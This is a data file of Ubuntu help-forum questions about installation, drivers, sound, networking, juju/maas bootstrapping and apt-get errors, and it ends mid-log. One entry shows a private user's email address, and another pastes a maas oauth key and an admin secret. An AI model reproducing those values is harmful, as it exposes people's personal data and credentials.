499891	ubuntu install - 'try ubuntu ' freezes screen	i was trying to install ubuntu 14.04 . first i chose the option 'try ubuntu ' to make sure everything was working properly . however the screen freezes with a dark background and the following sentences : starting mount network filesystem [ ok ] stopping mount network filesystem [ ok ] but it does n't go anywhere else . what should i do ?
499894	is it safe to answer `` erase disk and install ubuntu '' on a virtual machine ?	i am installing on virtualbox on mac . during install it asks : erase disk and install ubuntu question : is it asking about the virtual disk - hopefully . is it safe to answer ok ?
499895	ubuntu software center wont show what i searched	when i search macchanger in the ubuntu software center nothing shows up and when i go to the ubuntu software center on firefox and search macchanger it comes up so how do i get it to come up on the regular ubuntu software center ?
499897	removing fallback efi from refind	i 've installed the latest refind to manage a ssd partitioned with osx and ubuntu . this has been working great and has been set up exactly how i wanted it until a recent dist-upgrade . for some reason now my refind boot menu shows an option to boot fallback from efi with an unknown_os icon . selecting this option takes me into grub . i 've looked in my efi directory which contains /efi/bootx64.efi as well as bootx64.efi.grb . it also has the standard ubuntu and apple subdirectories containing the firmware.scap , grub , skim and mokmanager files . is there a safe way to remove the fallback entry from my boot menu as it was before ? thanks .
499899	all audio and video files play faster and have no sound	as the title says , all video and audio files , whether from youtube or some other web site or locally from my pc , play around 6x faster and there is no sound at all . i did n't preform any updates or software changes , the only possible cause would be running ( trying to run ) system testing application . i did n't have a particular reason to run it i was just curious . i am running ubuntu 12.04.4 . i viewed some similar posts to mine on different forums , as well as this one , and they did n't provide a solution . if any other info is needed please ask , i will provide it as soon as possible . thanks in advance . cheers !
499900	how get printer working cannon 5400	hi can anybody help me to install a cannon printer mg5450 but coming up with 5400 . then when you send to print it tries to print than nothing . also how do you install drivers .
499902	will ubuntu alter my other partitions on my pc	i have a compaq presario cq61-324ca . it is 4 years old and very slow on windows 7 . i want to install ubuntu on it . i tried it out on the live cd and it is great ! so i click install . question if i install ubuntu will it delete other partitions like my recovery drive and my system and hp-tools drive it came with ? or will it just touch my c : drive ?
499905	ethernet works with windows vista ultimate , but not in ubuntu 14.04	when i installed ubuntu 14.04 my ethernet is not connecting . anyone can help me , please ? networkmanager tool state : disconnected device : eth0 type : wired driver : r8169 state : unavailable default : no hw address : 00:24:1d:13:3d:08 capabilities : carrier detect : yes wired properties carrier : off
499909	how do package files .deb files that are installed outside the package tree get put into the normal package tree ?	so , i 've installed .deb files through double click or through dpkg , and i was wondering how do they get into the normal package tree structure you can get from apt-get synaptic etc . i mean , if you install on purpose an older or newer version of a package , or a package that is not yet in the repositories but may soon be , what consequences and behavior to expect ?
499911	unable to boot ubuntu 12.04	i have my hp probook 445 g1 ubuntu installed factory state . i was running out of boot space on my pc so i installed ubuntu-tweak to clean it.but it did n't worked . after that an error symbol is placed on top which says package has unmet dependencies . after that removed links from software update excluding the top four . after when i restarted my pc it got stuck on purple screen . what to do now ? ? ? ? ? ? plz help me i have lot of saved in there how to boot my pc now
499914	can i access hard drive files from ubuntu ?	here 's the thing . my windows computer is giving my a hard time getting to use my os and my files stored . i am planning on install ubuntu 14.04 on a usb flash and then i will try to get access to my files so that i can copy them over to an external hdd . will this work ? if not , can another method be suggested to me ? thanks for the support .
499917	where are the settings for disabling nepomuk and akonadi in the ui ?	where are the settings for disabling nepomuk and akonadi in the ui ? it used to be possible to disable akonadi and nepomuk from the desktop ui , but i ca n't seem to find them anymore . have they been removed ? i am using ubuntu 12.04 with the kde 4.13
499919	install older qt creator in 14.04	how can u install qt creator 2.x on trusty tahr ? i do n't like 3.x series because it links against qt 5 and , 1 ) my kde is not linking against 5 yet , 2 ) i 'm making widget plugins for qtc using qt4 .
499923	ubuntu 14.04 , intel chromebook , no sound	i am a total newbie to ubuntu , and i 'm not sure what to do here . i have a toshiba chromebook . i had a friend install the latest version of ubuntu on it for me . for a while , the audio in ubuntu was working fine , but now i ca n't hear any audio whatsoever . i 've tried various things other people have done to fix the problem , and nothing has worked . any help would be greatly appreciated , thanks .
499926	why do these xte commands work in terminal , but not when bound with xbindkeys ?	this xte command , when i run it in a terminal , triggers expo mode : xte 'keydown super_l ' 'key s ' 'keyup super_l' however , when i put this in my .xbindkeysrc file : '' xte 'keydown super_l ' 'key s ' 'keyup super_l ' '' b:11 nothing happens when i click the button . the following binding makes the letter x appear in my console when i press button 11 : '' xte 'key x ' '' b:11 so why does n't the expo binding work ? this is the verbose output of xbindkeys -n -v when clicking button 11 : button press ! e.xbutton.button=11 e.xbutton.state=16 '' xte 'keydown super_l ' 'key w ' 'keyup super_l ' '' m:0x0 + b:11 ( mouse ) got screen 0 for window 2bb start program with fork+exec call button release ! e.xbutton.button=11 e.xbutton.state=16 and nothing happens . does this have anything to do with the way xbindkeys executes the command ? ( fork+exec call ) attempt number two . expo.sh : # ! /usr/bin/env bash export display=:0 xte 'keydown super_l ' 'key s ' 'keyup super_l' executing this script from the command line activates expo . binding it in xbindkeys : '' sh ~/expo.sh '' b:11 clicking mouse button 11 : button press ! e.xbutton.button=11 e.xbutton.state=16 '' sh ~/expo.sh '' m:0x0 + b:11 ( mouse ) got screen 0 for window 2bb start program with fork+exec call nothing happens !
499928	wqhd hdmi geforce 460m	i have the proprietary nvidia driver installed in ubuntu 13.04 . i have a toshiba qosmio laptop with the geforce 460m gpu . in windows , i was able to use the configuration utility to successfully get it to display at 2560x1440_60 . in ubuntu , i attempt to use xrandr to create a resolution that high . it creates the resolution , and when it does , it it listed under dp-0 , not hmdi-0 . when i attempt to -- addmode to hdmi-0 , it kicks it back with an x org error message . does ubuntu prevent wqhd from being created on an hdmi adapter ?
499932	install on virtualbox seems stuck on `` running post install ''	the install on virtualbox 4.3.14 seems stuck on `` running post-install triggers software-center '' . it has been at this screen for over an hour . can i skip this step ? 7/19/14 9:07:20.973 am virtualbox [ 37183 ] : modalsession has been exited prematurely - check for a reentrant call to endmodalsession : 7/19/14 12:22:50.911 pm virtualbox [ 37183 ] : -_continuousscroll is deprecated for nsscrollwheel . please use -hasprecisescrollingdeltas . 7/19/14 12:22:50.911 pm virtualbox [ 37183 ] : -devicedeltax is deprecated for nsscrollwheel . please use -scrollingdeltax . 7/19/14 12:22:50.911 pm virtualbox [ 37183 ] : -devicedeltay is deprecated for nsscrollwheel . please use -scrollingdeltay . i am using ubuntu 14.04 on a mac .
499933	how to auto restart a command after it closes down ?	i am using rtmpdump to restream live video on my local network on nginx rtmp server . like this : sudo rtmpdump -r `` rtmp : //123.45.6.7/live/ '' -a `` live/ '' -f `` lnx 14,0,0,125 '' -w `` http : //123.45.6.7/jwplayer.flash.swf [ 1 ] `` -p `` http : //123.45.6.7/ [ 2 ] `` -- live -y `` livestream2 '' | avconv -i pipe:0 -y -v : v info -vcodec copy -acodec copy -f flv rtmp : //localhost:1935/live/ it works great on its own with no problem but once in a while the original source might flicker and it will cause the running command to quit , and i have to manually run the command again . is there a way to make a script which will automatically detect if rtmpdump quit and there is no zombie command running and rerun the command ? i want to automate this process for about 4 live streams . is it possible ?
499934	ubuntu installation - the attempt to mount a file system failed	when installing ubuntu , right after partitioning , i get the following error : the attempt to mount a file system with type ntfs in scsi1 ( 0,0,0 ) , partition # 4 ( sda ) at /windows failed . what does this mean and how do i fix it ? i 'm trying to install ubuntu alongside windows 8 .
499935	pcmcia card sd reader not recognized	i have a dell 620 running ubuntu 14.04 ( all updates done , fresh install ) , and an old `` four in one pcmcia cardreader '' plugged into the pcmcdi slot of the dell machine . i have a working sd card in the card reader , but this machine do not see the card . i tried the sd card directly in another ubuntu machine ( which has a sd card reader embedded in the hardware ) , and it works . so the issue is likely to be with the pcmcia card . how can i troubleshoot this ? thanks , fx
499936	ubuntu 14.04 on hp s7620.uk with nvidia geforce 7500 le	hi i am looking to setup a dual boot on a hp s7620.uk with win xp and ubuntu 14.04 when i tried running ubuntu 14.04 from a dvd without installing i got several lines of errors saying the gpu had timed out , eventually it offered to run in low graphics mode . will it be a case of install ubuntu and then update the graphics drivers or will it be a lot more involved ? this is my first go at using ubuntu ! thanks .
499938	brightness buttons on macbook pro 7.1	i 'm following the steps here . the website says to set the driver to nvidia binary xorg driver and nvidia-current ( not nvidia-current-updates ) , but i do n't see that option . i set the driver to nvidia binary driver version 331.38 from nvidia 331 ( proprietary , tested ) then rebooted the computer and now it says i am using the recommended drivers . nonetheless , i ca n't re-enable the brightness buttons when following the website instructions . first i tried running nvidia-xconfig in a terminal and it says , billy @ billy-macbookpro : ~ $ nvidia-xconfig warning : unable to locate/open x configuration file . error : unable to write to directory '/etc/x11 ' . then i tried sudo gedit /etc/x11/xorg.conf and it says , ( gedit:4739 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files and the xorg.conf text document opens but is blank ( nothing to edit/change ) .
499939	extending harddisk space	ok , so i had installed ubuntu on my hp laptop by completely removing windows 8.1.now the problem is that i have 500gb of disk space originally and ubuntu has used up arond 80 gb of it.i can not access the remaining 420 gb now i.e it can not be seen from my ubuntu desktop.please help as i want to change the 80gb to the whole of 500gb .
499943	cgi-bin does not seem to be set up	i 've used tasksel and installed lamp server . but i ca n't seem to figure if cgi-bin is set up . there is no cgi-bin in the web root folder . and when i try and call a test.py file from the browser , it downloads it rather than executes it . i 've had a look at various how-to 's but i 'm still no closer . ubuntu 14.04 apache 2.4.7 ( apr 3 2014 )
499945	can not change the text entry language on ubuntu 14.04 under vmware workstation on windows 7	host : windows 7 sp1 virtualization platform : vmware workstation 10 guest : ubuntu 14.04 hardware : acer aspire v5-573g under system settings - > text entry i added english , german and bulgarian . then in the menu bar i change the language to either bulgarian or german . however , when i type i still get only english letters . i have successfully installed the vmware tools . i also checked the settings of the vm but did n't see any keyboard specific settings . what else do i need to set in order to be able to type in different languages ?
499947	how to install ubuntu on device micromax a52	i would like to install ubuntu on my micromax a52 android device via windows , as i do n't have ubuntu on my system .
499948	ca n't get dw1525 ( 802.11n ) wlan pcle card working	i have a ubuntu server cloud 14.04 lts , and my wireless card is dw1525 ( 802.11n ) wlan pcle card . my network is using wpa 1 as the encryption . i followed steps at post on the wpa part http : //home.roadrunner.com/~computertaijutsu/wireless.html , but it didnt work for me . when i tried to run wpa_supplicant -dwext -iwlan0 -cwpa.conf as it is suggested in the post , i got following message back : ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument wlan0 : trying to associate with [ my network ] ioctl [ siocsiwfreq ] : device or resource busy wlan0 : association request to the driver failed wlan0 : associated with [ my network ] wlan0 : wpa : key negotiation completed with [ my network ] wlan0 : ctrl-event-connected - connection to [ my network ] completed i tried to ctrl-z to suspend the process in background and try to ping www.google.ca , it still gives me `` unable to resolve the host '' . i suspect that it still havent connect to network yet
499949	ubuntu 14.04 lts triple boot	i 've already installed both windows 7 dual boot and want to install ubuntu 14.04 lts alongside them while i trying install ubuntu 14.04 lts has n't saying multiple oss only says this computer has windows 7 how do i install ubuntu 14.04 lts multiple boot , alongside both windows 7 ? answer expecting as both windows7 and ubuntu 14.04 lts
499950	downloading files from ubuntu 1 to mac	i have tried to download my files from ubuntu-one to my macbook but it does n't work . i downloaded the u1-downloader and called up directions for use on mac . below is what comes up in my terminal when i do everything according to directions : last login : sat jul 19 18:32:47 on ttys000 macbooks-macbook-pro : ~ macbook $ /users/macbook/downloads/u1-downloader-osx-r23/u1_downloader ; exit ; u1 email : winjamarielutz @ googlemail.com u1 password : traceback ( most recent call last ) : file `` < string > '' , line 374 , in < module > file `` < string > '' , line 346 , in main file `` < string > '' , line 152 , in get_session file `` < string > '' , line 131 , in _get_token file `` /users/alecu/canonical/u1-downloader/build/u1_downloader/out00-pyz.pyz/requests.api '' , line 88 , in post file `` /users/alecu/canonical/u1-downloader/build/u1_downloader/out00-pyz.pyz/requests.api '' , line 44 , in request file `` /users/alecu/canonical/u1-downloader/build/u1_downloader/out00-pyz.pyz/requests.sessions '' , line 383 , in request file `` /users/alecu/canonical/u1-downloader/build/u1_downloader/out00-pyz.pyz/requests.sessions '' , line 486 , in send file `` /users/alecu/canonical/u1-downloader/build/u1_downloader/out00-pyz.pyz/requests.adapters '' , line 385 , in send requests.exceptions.sslerror : [ errno 185090050 ] _ssl.c:343 : error:0b084002 : x509 certificate routines : x509_load_cert_crl_file : system lib logout [ prozess beendet ]
499951	are internet connection passwords available from some location in /home ?	i keep /home on a separate partition . i upgrade by performing a fresh install . i assume that my internet connection passwords , like most of my other settings , will be stored somewhere in /home and so will be preserved . but , no , they 're saved in /etc/networkmanager/system-connections , so a fresh install wipes them out . are they somehow retrievable from some location in /home ? thank you .
499953	asus x550l weak wifi signal ubuntu 14.04	i 'm new to ubuntu os . i 've installed ubuntu 14.04 x64 on my asus x550lc laptop yesterday . the wifi signal is weak & getting disconnected sometimes . searched all over the web but many site/forums has discussed with atheros network adapter but the one i have is ralink rt3290 . this what my iwconfig gives : ppp0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . usbpn0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off
499956	windows7 and ubuntu 14.04 problem on asus n550jv db71 laptop	i have asus n550jv db71 laptop . i want to use both windows 7 and ubuntu 14.04 on it . firstly i turn off pc 's uefi mode . that is , i switched off/disable secure boot and fast boot choices from bios settings . then i partitioned my drive into three partitions on laptop using windows 7 i converted mbr partitions all drives using sudo gdisk /dev/sda ( using ubuntu live cd ) . please see the below images : https : //www.dropbox.com/s/qc4su7zantvjznt/2.png https : //www.dropbox.com/s/6o8claaxar1je0w/3.png then i re-installed windows 7 on sda1 and ubuntu 14.04 on sda3 , respectively . pc was opened . on start i chose windows from grub menu . i heard the opening sound of windows but i could n't see it ( desktop ) . i turn off pc using the power switch of laptop . then i turn on pc . and windows was normally opened . this time i normally turn pc off in windows . and i turn on pc again . unfortunately i heard the opening sound of windows but i could n't see it ( desktop ) again . by the way , ubuntu opens normally . where is my mistake ? and is there anyone that uses both win7/win8 and ubuntu 14.04 ( or another version ) on this laptop ?
499959	no sound-indicator after login	this is a weird one ! : ( an fresh ubuntu 14.04 install ( an hour into installing all my stuff ) .. , i can play sound just fine , but there 's no sound indicator . if i go to system settings and then into sound i can make it pop up - but it 's in a mute position and i ca n't change the volume ... the sound devices in the sound settings do n't show up and the volume control does n't work ... however i can set the volume fine on the login screen ! : ( no idea how to fix it , or how i broke it ... : (
499961	how to install ubuntu in my windows 8.1 ( pre-installed genuine ) computer ?	i run windows 8.1 on my hp pavilion computer . i have not partitioned my hard-disk yet . i want to install ubuntu as a secondary os on my computer . can anyone help me with step-by-step procedure ?
499962	strange update notice	is this normal ? i do n't have flashplugin installed . failure to download extra data filesname-ar.utf-8 : فشل تنزيل ملفات البيانات الإضافيةname-ast.utf-8 : fallu al descargar ficheros de datos estraname-bn.utf-8 : অতিরিক্ত ডাটা ফাইল ডাউনলোড করতে ব্যর্থ হয়েছেname-bs.utf-8 : neuspjelo učitavanje dodatnih datoteka s podacimaname-ca.utf-8 : ha fallat la baixada dels fitxers de dades addicionalsname-da.utf-8 : kunne ikke hente ekstra datafilername-de.utf-8 : herunterladen von zusätzlichen datendateien schlug fehlname-el.utf-8 : αποτυχία λήψης επιπλέον αρχείων δεδομένωνname-en_au.utf-8 : failure to download extra data filesname-en_gb.utf-8 : failure to download extra data filesname-eo.utf-8 : fiasko dum elŝutado de pliaj datumdosierojname-es.utf-8 : fallo al descargar archivos de datos extraname-fi.utf-8 : ylimääräisten tiedostojen lataus epäonnistuiname-fr.utf-8 : échec du téléchargement des données supplémentairesname-gd.utf-8 : dh'fhàillig luchdadh a-nuas faidhlichean dàta a bharrachdname-gl.utf-8 : fallo na descarga de ficheiros extra de datosname-he.utf-8 : הורדת קובצי נתוני נוספים נכשלהname-hr.utf-8 : greška pri preuzimanju dodatnih podatkovnih datotekaname-hu.utf-8 : nem sikerült letölteni az extra adatfájlokatname-id.utf-8 : gagal mengunduh berkas data ekstraname-it.utf-8 : scaricamento file dati extra non riuscitoname-ja.utf-8 : 追加データのダウンロードに失敗name-km.utf-8 : បាន​បរាជ័យ​ក្នុង​ការ​ទាញយក​ឯកសារ​ទិន្នន័យ​បន្ថែមname-lt.utf-8 : nepavyko atsiųsti papildomų duomenų failųname-lv.utf-8 : neizdevās lejupielādēt papildus datu failusname-ms.utf-8 : gagal memuat turun fail data tambahanname-nl.utf-8 : downloaden van extra gegevensbestanden is misluktname-oc.utf-8 : fracàs del telecargament de las donadas suplementàriasname-pt_br.utf-8 : falha ao baixar arquivos de dados adicionaisname-ro.utf-8 : eșec la descărcarea fișierelor cu date suplimentarename-ru.utf-8 : ошибка загрузки дополнительных файлов данныхname-sk.utf-8 : zlyhalo stiahnutie ďalších dátových súborovname-sl.utf-8 : napaka med prejemom dodatnih podatkovnih datotekname-sq.utf-8 : dështoi shkarkimi i skedarëve të të dhënave ekstraname-sv.utf-8 : misslyckades med att hämta extra datafilername-tr.utf-8 : fazladan veri dosyalarını indirme başarısızname-ug.utf-8 : قوشۇمچە سانلىق-مەلۇمات ھۆججەتلىرىنى چۈشۈرۈش مەغلۇپ بولدىname-uk.utf-8 : не вдалось завантажити додаткові файли данихname-vi.utf-8 : lỗi khi tải các tập tin dữ liệu bổ sung xuốngname-zh_cn.utf-8 : 下载额外数据文件失败name-zh_tw.utf-8 : 下載額外資料檔案失敗 the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . > running this command requires an active internet connection .
499965	screen does n't turn back on after powersave	i 've run ubuntu 12.04 ( 64bit ) for quite some time and i 've never had any significant problem . some days ago the update manager warned me about the hwe endlife support for ubuntu 12.04 and encouraged me to upgrade so i did . i did n't noticed any problem except for the touchpad which was not working anymore : i just needed to install the xserver-xorg-input-synapitic package which was strangely removed . what totally blew my mind is that when the screen ( after 10 min in my settings ) turns off to save power i can not turn it back on either by pressing any key or moving the mouse . the only thing i can do is force reboot with alt+stamp+b . even more strangely the suspend function works as a charm . is the power saving mode for the screen that does n't work any more . i need your help since i do n't know where to start to trouble shoot . i 've attached a lshw output , hopefully it helps . thank you ps : my laptop is a hp dv6-6156sl pps : if i close the lid i can not turn the screen back on either : (
499969	how to uninstall teamspeak 3 client on ubuntu 14	i tried to uninstall teamspeak 3 client with this command rm but it does not succeed . how do i completely uninstall it ?
499970	i 've changed my computer host name , but it 's not affected on files ?	i have changed the name of a newer laptop to my name , but all files etc. , are still referred to as the old name . in your discription to change host name using cmd prompt , i did n't understand how to put the proper line in the prompt .
499971	unable to mount a partition of external 3tb hard drive..gpt warning	my external hdd has five partitions and i am able to mount 4 partitions except one ( labeled office ) which is of 1tb and has all my backups . i am providing more information below fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xda73e482 device boot start end blocks id system /dev/sda2 * 2048 409599 203776 42 sfs /dev/sda3 409600 1227823103 613706752 42 sfs /dev/sda4 1227825150 1465147391 118661121 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 1227825152 1432625933 102400391 83 linux /dev/sda6 1432627200 1465147391 16260096 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 3000.6 gb , 3000558944256 bytes 255 heads , 63 sectors/track , 364797 cylinders , total 5860466688 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . gparted for the 3 tb external drive outputs the following : /dev/sdb2 : label= '' new volume '' uuid= '' ba5ec1045ec0ba81 '' type= '' ntfs '' /dev/sdb3 : label= '' rashmi '' uuid= '' 5822a0f722a0db70 '' type= '' ntfs '' /dev/sdb4 : label= '' legal '' uuid= '' d6e048d5e048bd8d '' type= '' ntfs '' /dev/sdb5 : label= '' entertainment '' uuid= '' c65e11415e112c25 '' type= '' ntfs '' /dev/sdb6 : label= '' photos '' uuid= '' ca1adb271adb0f77 '' type= '' ntfs '' /dev/sdb7 : label= '' office '' uuid= '' 32588f11588ed2d1 '' type= '' ntfs '' i can not mount /dev/sdb7 , that is , the partition labeled `` office '' .
499980	how to set up password check on unmounting ntfs partitions ?	i have dual boot pc laptop with windows 7 and ubuntu 14.04 . my pc has two hard drivers : /dev/sda - that is ssd drive containing windows c : ntfs partition and ubuntu / and swap filesystems . /dev/sdb - that is traditional hard disk drive containing windows d : ntfs partition i want to have both of my ntfs partitions mounted automatically and read-only . ubuntu 14.04 automatically mounts both ntfs partitions , but read-write , which is not exactly what i want . so i created mount directories under /media and added the following lines to my /etc/fstab : # windows c : /dev/sda1 uuid=2ef64975f6493df9 /media/win_c ntfs defaults , umask=222 0 0 # windows d : /dev/sdb1 uuid=50c40c08c40beed2 /media/win_d ntfs defaults , umask=222 0 0 now both ntfs partition are mounted automatically and read-only . however , i observed a strange behavior in nautilus , that i want to correct . first , the c : partition has different icon than d : partition ; moreover , c : partition is attached to launcher , while d : is not . why ? second , i can unmount c : partition by clicking on eject icon , but if i want to unmount d : partition the same way , i am asked of password . i like the password check here , so i want to have the same for c : . why there is a difference between c : and d : partition behavior ? what should i put into my /etc/fstab to have nautilus ask of password when unmounting c : partition as well ?
499981	sound balance and volume adjustment - ubuntu 14.04	when i change the balance of the sound output in sound settings , i try to maximize the volume with the icon in the right upper part near the language icon . every time i try , either it hardly changes the volume percent , or it goes down gradually and again up in hardly changing manner . when i change the volume via sound settings , everything is good , but when i try through the icon , i get that weird glitch i just described . i searched everywhere and did n't find a similar question to mine . how can i solve this weird and annoying glitch ?
499982	ambiance theme git repository	does the default theme for ubuntu ( ambiance ) have an official git repository ? i want to modify it adding my tweaks , and it already has a git repository i choose to take it as start repository .
499984	juju bootstrap - 403 forbidden `` not allowed to start up this node ''	i try to deploy maas/juju for the first time and i have some problems when i try to bootstrap juju . here 's my errors : root @ maas-server : ~/.juju # juju bootstrap launching instance warning picked arbitrary tools & { `` 1.18.4-precise-amd64 '' `` https : //streams.canonical.com/juju/tools/releases/juju-1.18.4-precise-amd64.tgz '' `` fa87616011cf2fbc7f25a646b59070aa8df1e54d6edfd279281894e9c3fbcc4d '' % ! q ( int64=5360167 ) } error bootstrap failed : can not start bootstrap instance : gomaasapi : got error back from server : 403 forbidden ( you are not allowed to start up this node . ) bootstrap failed , destroying environment error can not start bootstrap instance : gomaasapi : got error back from server : 403 forbidden ( you are not allowed to start up this node . ) here 's my environments.yaml environments : vb-maas : type : maas maas-server : http : //10.0.0.1:80/maas maas-oauth : `` bmpxsbzdqp4xuvyyju:8ctdlursac7unj7t2m : ywbhudxuevhzuxzphbky9p8wmsyfdmcl '' admin-secret : super-secret-made-up-admin-key default-series : precise authorized-keys-path : /root/.ssh/id_rsa.pub ubuntu serve ( maas server ) is a 14.04 version . juju : 1.18.1-trusty-amd64 maas : 1.5.2+bzr2282-0ubuntu i have 2 nodes `` ready '' . considering the `` 403 error '' , i assume there is a problem with a key , password or privilege ... i deleted maas-key and re-generate a another one , no change . thank you for your help !
499986	apt-get update does not work	i have just installed ubuntu for the second time ( separate downloads ) onto my nexus 7 . both the times i could not use apt-get upgrade and thus could not install any applications . upon the second installation i turned the terminal mode on while setup was happening and noticed that glibc had not set up properly for some reason both the times ( could this be the problem ? ? ) . i have tried all the possible things i could find off other questions . some other things i can think would be important are- during both the downloads the internet connection was lost in the middle and then the download was recovered i have just attached a new switch into my connection , this has been giving me some dsl problems on my pc but not on wifi so i dont think this is the cause i can browse webpages and do virtaully anthing related to the internet on ubuntu but when i try to send an error report or a bug report the the update fails due to no internet connectivity ! also when i try to select the best server it gives the same error ping to 8.8.8.8 gives back a 0 % loss for some reason when i try to select my mirror and chose the regional one ( in.ubuntu.archive.com/ubuntu ) it selects that mirror but upon reboot resets to the main one . this happens even if i change it in the sources.list upon installation of the latest 13.04 on my nexus 7 , i am asked to upgrade to the more stable 13.10 but i am not able to do this in termianl since it says i have no internet connectivity and when i do it through the update manager , the confirmation window is too big for my screen and i can not select accept so i am still using the 13.04 apart from the glibc error displayed on setup i do not beleive there was any other error during installation . i used the multirom instructions step by step . the error messages vary everytime from , something wicked has happened to some files failed to install and sometimes both i have been trying to test this on my old nexus 7 as a test before putting it on my new one , but dont think that i will unless this problem is solved . any help is appreaciated ! : ) please tell me if you want to see my sources.list , resolv.conf or installation logs i have removed http : // so it does n't show links root @ pranay-finaltest : /home/pranay # apt-get update ign archive.ubuntu.com raring release.gpg ign archive.ubuntu.com raring release err archive.ubuntu.com raring/main sources 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/restricted sources 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/universe sources 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/multiverse sources 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/main armhf packages 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/restricted armhf packages 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/universe armhf packages 404 not found [ ip : 91.189.92.200 80 ] err archive.ubuntu.com raring/multiverse armhf packages 404 not found [ ip : 91.189.92.200 80 ] ign archive.ubuntu.com raring/main translation-en_in ign archive.ubuntu.com raring/main translation-en ign archive.ubuntu.com raring/multiverse translation-en_in ign archive.ubuntu.com raring/multiverse translation-en ign archive.ubuntu.com raring/restricted translation-en_in ign archive.ubuntu.com raring/restricted translation-en ign archive.ubuntu.com raring/universe translation-en_in ign archive.ubuntu.com raring/universe translation-en w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/universe/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/multiverse/source/sources 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/main/binary-armhf/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/restricted/binary-armhf/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/universe/binary-armhf/packages 404 not found [ ip : 91.189.92.200 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/raring/multiverse/binary-armhf/packages 404 not found [ ip : 91.189.92.200 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . root @ pranay-finaltest : /home/pranay # gedit /etc/apt/sources.list root @ pranay-finaltest : /home/pranay # apt-get update ign archive.ubuntu.com raring release.gpg ign archive.ubuntu.com raring-security release.gpg ign archive.ubuntu.com raring release ign archive.ubuntu.com raring-security release err ports.ubuntu.com raring-backports release.gpg something wicked happened resolving 'ports.ubuntu.com : http ' ( -11 - system error ) err archive.ubuntu.com raring/main sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring/restricted sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring/universe sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring/multiverse sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring/main armhf packages 404 not found [ ip : 91.189.91.13 80 ] ign ports.ubuntu.com raring-security release.gpg ign ports.ubuntu.com raring-backports release err archive.ubuntu.com raring/restricted armhf packages 404 not found [ ip : 91.189.91.13 80 ] ign ports.ubuntu.com raring-security release err archive.ubuntu.com raring/universe armhf packages 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring/multiverse armhf packages 404 not found [ ip : 91.189.91.13 80 ] ign archive.ubuntu.com raring/main translation-en_in ign archive.ubuntu.com raring/main translation-en ign archive.ubuntu.com raring/multiverse translation-en_in ign archive.ubuntu.com raring/multiverse translation-en ign archive.ubuntu.com raring/restricted translation-en_in ign archive.ubuntu.com raring/restricted translation-en ign archive.ubuntu.com raring/universe translation-en_in ign archive.ubuntu.com raring/universe translation-en err archive.ubuntu.com raring-security/main sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring-security/restricted sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring-security/universe sources 404 not found [ ip : 91.189.91.13 80 ] err archive.ubuntu.com raring-security/multiverse sources 404 not found [ ip : 91.189.91.13 80 ] 24 % [ waiting for headers ] ^c root @ pranay-finaltest : /home/pranay # gedit /etc/apt/sources.list root @ pranay-finaltest : /home/pranay # apt-get update ign ports.ubuntu.com raring-security release.gpg ign ports.ubuntu.com raring-security release ign archive.ubuntu.com raring release.gpg ign archive.ubuntu.com raring-updates release.gpg ign archive.ubuntu.com raring-security release.gpg ign archive.ubuntu.com raring release ign archive.ubuntu.com raring-updates release ign archive.ubuntu.com raring-security release err ports.ubuntu.com raring-security/main armhf packages 404 not found [ ip : 91.189.88.140 80 ] err ports.ubuntu.com raring-security/restricted armhf packages 404 not found [ ip : 91.189.88.140 80 ] err ports.ubuntu.com raring-security/universe armhf packages 404 not found [ ip : 91.189.88.140 80 ] err ports.ubuntu.com raring-security/multiverse armhf packages 404 not found [ ip : 91.189.88.140 80 ] ign ports.ubuntu.com raring-security/main translation-en_in ign ports.ubuntu.com raring-security/main translation-en ign ports.ubuntu.com raring-security/multiverse translation-en_in ign 